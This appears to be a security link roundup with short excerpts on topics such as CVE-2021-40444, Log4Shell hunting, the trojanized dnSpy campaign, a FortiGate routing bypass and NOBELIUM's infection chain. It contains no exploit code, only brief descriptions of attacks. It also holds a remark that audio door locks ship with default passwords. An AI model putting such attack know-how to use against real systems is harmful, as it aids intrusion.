Scanning millions of domains and compromising email supply chains
By utilising the free domain scan tooling created here at CanIPhish, you can visualise the full extent of your email sender and receiver supply chains.
https://caniphish.com/phishing-resources/blog/compromising-australian-supply-chains-at-scale
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
The attackers make a request to the exploit CAB file with an XMLHttpRequest.
https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/
Trojanized dnSpy app drops malware cocktail on researchers, devs
Hackers targeted cybersecurity researchers and developers this week in a sophisticated malware campaign distributing a malicious version of the dnSpy.
https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/
Get expert training on advanced hunting
Get more expert training with L33TSP3AK: Advanced hunting in Microsoft 365 Defender, a webcast series for analysts looking to expand their technical knowledge and practical skills in conducting security investigations using advanced hunting in Microsoft 365 Defender.
https://docs.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-expert-training
Log4Shell exploitation and hunting on VMware Horizon – PwnDefend
In the standard vmware logs you will largely not see exploitation.
https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/
cybersecsi/RAUDI: A repo to automatically generate and keep updated a series of Docker images through GitHub Actions.
RAUDI automatically generates and keep updated a series of Docker Images through GitHub Actions for tools that are not provided by the developers.
https://github.com/cybersecsi/RAUDI
Execute NPM securely by separating the script execution from the install phase.
https://medium.com/cider-sec/npm-might-be-executing-malicious-code-in-your-ci-without-your-knowledge-e5e45bab2fed
DarkCoderSc/PowerRemoteDesktop: Remote Desktop entirely coded in PowerShell.
As the name suggests, Power Remote Desktop is a Remote Desktop application entirely coded in PowerShell.
https://github.com/DarkCoderSc/PowerRemoteDesktop
Linux kernel exploit development
On Linux kernel exploit development, this series follows the same pattern of exploit mitigations using pwn.
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development
You can use default admin password :).Until now, I try 3 Audio Door Locks and all of them have default passwords.
https://sockpuppets.medium.com/bypassing-door-passwords-4004b8d7995
Announcing Personal Identifiable Information detection and remediation in AWS Glue
Personal Identifiable Information detection and remediation in AWS Glue is now available in preview.
https://aws.amazon.com/about-aws/whats-new/2022/01/aws-glue-preview-pii-detection-remediation/
If the firewall only sees the return packets, they are dropped as the firewall has no prior state information about the flow.
https://medium.com/sensorfu/lopsided-routing-a-stealthy-hole-punch-into-fortigate-6f25b2805b9c
redcanaryco/redcanary-ebpf-sensor: Red Canary's eBPF Sensor
To build this project run docker-compose run -rm ebpf make all.
https://github.com/redcanaryco/redcanary-ebpf-sensor
Google Acquires Siemplify
We're looking forward to welcoming the Siemplify team to Google Cloud and working with them to help security operations teams accomplish so much more in defense of their organizations.
https://cloud.google.com/blog/products/identity-security/raising-the-bar-in-security-operations
NOBELIUM's EnvyScout infection chain goes in the registry, targeting embassies
Unlike the previously described NOBELIUM spear phishing attacks disclosed by Microsoft, the downloaded ISO files no longer contained a malicious DLL and a shortcut aimed to launch that DLL. In both cases, the ISO simply embeds a malicious HTML Application file, executing the rest of the exploitation chain.
https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/
|